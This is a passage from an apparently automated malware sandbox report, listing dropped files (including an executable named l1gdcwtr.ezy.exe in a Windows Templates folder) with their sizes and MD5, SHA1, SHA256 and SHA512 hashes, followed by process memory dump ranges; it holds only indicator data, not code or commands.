                                                                                  23f43cc11c07245b3c5c14333a53b97330ebd7afa4a893245834fbebfa967d88

                                                                                  SHA512

                                                                                  2fd66a8fd5b4d0f1ef52f6cd89b8e14936b56fdb967a83382d8081e67fbbabdb609decef98d19c8caebcc1b5b9bcc3cbaa0209112c9c081556ff87bfcdf7308b

                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                  Filesize

                                                                                  7KB

                                                                                  MD5

                                                                                  32c10adfa070cac5233ba09dfd7d6568

                                                                                  SHA1

                                                                                  549315ddea6a09bbdf25c552d4a20183483564a1

                                                                                  SHA256

                                                                                  cb59c3b2085b9e3950cb64e35a1d8defd4bcc3ec5bfce3c216f7cc80f87d62bf

                                                                                  SHA512

                                                                                  61623834c50f3ce0daa1d9a9db15930ddb473a09ac69f5ab9f5a0a17dac4b2f45d727c7be5a9dadd6af7b66489f9c3f57b070fd8f35aa11dddc256c4290ebf20

                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\l1gdcwtr.ezy.exe

                                                                                  Filesize

                                                                                  227KB

                                                                                  MD5

                                                                                  53681862212e052e3c6b3e9ca9594428

                                                                                  SHA1

                                                                                  f89c700368b19d182062f673f9b51199e08c47cc

                                                                                  SHA256

                                                                                  2576a8b91992cead33bc30b306852a6fbaa559fff89a534537495abe76aca3a2

                                                                                  SHA512

                                                                                  2f9649751aeeabd4e59b7e172937518bb6867ce99eee00687243d6218edbdbc5d573a5cea36416131a3787360d215d557f91c75f480d30ce3d6bbd1152e81fa8

                                                                                • memory/1736-59-0x00000000021D0000-0x00000000021D8000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/1736-58-0x000000001B620000-0x000000001B902000-memory.dmp

                                                                                  Filesize

                                                                                  2.9MB

                                                                                • memory/2444-47-0x000000001B6B0000-0x000000001B992000-memory.dmp

                                                                                  Filesize

                                                                                  2.9MB

                                                                                • memory/2444-48-0x0000000001E00000-0x0000000001E08000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/2684-51-0x0000000000180000-0x00000000001C0000-memory.dmp

                                                                                  Filesize

                                                                                  256KB

                                                                                • memory/2848-7-0x0000000000860000-0x000000000086C000-memory.dmp

                                                                                  Filesize

                                                                                  48KB

                                                                                • memory/2848-41-0x0000000000890000-0x000000000089C000-memory.dmp

                                                                                  Filesize

                                                                                  48KB

                                                                                • memory/2848-14-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/2848-10-0x0000000000870000-0x000000000087A000-memory.dmp

                                                                                  Filesize

                                                                                  40KB

                                                                                • memory/2848-0-0x000007FEF5493000-0x000007FEF5494000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/2848-5-0x000007FEF5493000-0x000007FEF5494000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/2848-3-0x000007FEF5490000-0x000007FEF5E7C000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/2848-1-0x00000000008C0000-0x0000000000926000-memory.dmp

                                                                                  Filesize

                                                                                  408KB